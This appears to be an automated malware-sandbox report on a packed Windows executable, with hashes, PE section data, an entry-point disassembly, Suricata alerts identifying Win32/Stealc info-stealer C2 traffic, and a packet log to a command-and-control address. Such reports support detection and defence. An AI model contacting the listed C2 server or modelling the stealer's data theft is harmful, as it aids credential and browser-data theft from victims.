SHA256:	9c6971462e3db561147b9a7291e611b275c9053af1c1aa83abe5327ab197739f
SHA512:	b95e9329f446cabd287632e8d5ec4fcdefb61b0fa4b027b279c256285a0044d85566ce7dcf9b7b37b3151f7fdf4d9c184993919ec7ea9294d98ef3f5165fb03e
SSDEEP:	49152:uxc54VBKXpK4QFrBd0cDldZo4gRbMHMjAmq6T:6bgXpKHRTDldy4ubpAT6
TLSH:	9B8533B0412F810CFC0E873421AE1B775C7FDD81286B29211AEE3F27A877D6D95592B6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa90000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF830C795BAh
pshufw mm3, qword ptr [ebx], 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FF830C7B5B5h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23f050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23f1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x23d000	0x13c00	9987b91a1a4f079db1a8c880762427e3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23e000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x23f000	0x1000	0x200	380655991303f284fcb90ef8e49522a1	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x240000	0x2ad000	0x200	821d033a7893b7a3766e43b4ac18b449	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aeddekjg	0x4ed000	0x1a2000	0x1a1c00	78e020df66248762d03f49527a949047	False	0.995004394823459	data	7.953688410492085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
huvayiog	0x68f000	0x1000	0x400	5fa68c199732a8b898cdc41965c3d23d	False	0.728515625	data	5.821020073268841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x690000	0x3000	0x2200	540df3fd888c2ff3988703ba52a8e525	False	0.06307444852941177	DOS executable (COM)	0.7686438070244618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T15:42:54.875200+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:47.521879+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:49.113647+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:57.225876+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:56.658192+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:47.773199+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49704	185.215.113.100	192.168.2.5
2024-08-29T15:42:47.766927+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:58.879083+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:48.020664+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49704	185.215.113.100	192.168.2.5
2024-08-29T15:42:48.013618+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:59.238652+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:49.611902+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-29T15:42:56.188741+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 15:42:46.514581919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:46.519495964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:46.519576073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:46.519942045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:46.524753094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.259485960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.259584904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.262902975 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.267678022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.521785975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.521878958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.523775101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.528618097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.766781092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.766808987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:47.766927004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.766927004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.768364906 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:47.773199081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013556957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013573885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013583899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013595104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013617992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.013637066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013648987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013694048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.013694048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.013890982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013902903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.013950109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.013950109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.015831947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.020663977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.259495974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.259567976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.280742884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.280805111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:48.285610914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.285636902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.285654068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.285695076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.285733938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.285876036 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:48.285887003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.113516092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.113646984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.370970964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.375890970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.611748934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.611763954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.611774921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.611886024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.611901999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.611933947 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.611954927 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.611998081 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.612199068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.612268925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.612333059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.612344027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.612356901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.612385988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.612420082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.612509012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.612544060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.612570047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.612587929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613002062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613090992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613091946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613104105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613181114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613185883 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613245010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613691092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613739014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613759995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613784075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613835096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613853931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.613893986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.613909960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.814263105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.814277887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.814367056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815145969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815165043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815205097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815222025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815222979 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815241098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815273046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815285921 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815501928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815565109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815606117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815661907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815792084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815809011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815829992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815846920 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.815857887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815857887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815875053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.815906048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.816715956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.816730976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.816746950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.816772938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.816796064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.816874027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.816890001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.816924095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.816956997 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.817512035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.817528009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.817544937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.817563057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.817595005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.817595005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.818025112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.818042994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.818058968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.818082094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.818109035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.818119049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.818136930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.818175077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.818190098 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993824959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.993846893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.993872881 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.993889093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.993890047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993906021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.993918896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993918896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993923903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.993937969 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993968010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993968010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.993985891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994033098 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994062901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994080067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994096994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994103909 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994141102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994141102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994559050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994615078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994618893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994632959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994669914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994669914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994676113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994693041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994709969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.994726896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994735956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.994759083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.995541096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.995564938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.995583057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.995604992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.995604992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.995634079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.995636940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.995651007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.995666981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.995692015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.995692015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.995702028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.996397018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.996440887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.996458054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.996474028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.996499062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.996520042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.996526957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.996542931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.996557951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.996581078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.996581078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.996598959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.997421026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.997436047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.997452021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.997479916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.997479916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.997486115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.997498035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.997503042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.997519016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.997539043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.997539043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.997565985 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.998291969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.998338938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.998344898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.998362064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.998395920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.998395920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.998428106 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.998444080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.998459101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.998483896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.998483896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.998505116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.999193907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.999264002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.999272108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.999279976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.999298096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.999315023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.999320030 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.999320030 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.999332905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:49.999351025 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.999351025 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:49.999375105 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.000152111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.000206947 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.000226974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.000247002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.000730991 CEST	80	49704	185.215.113.100	192.168.2.5
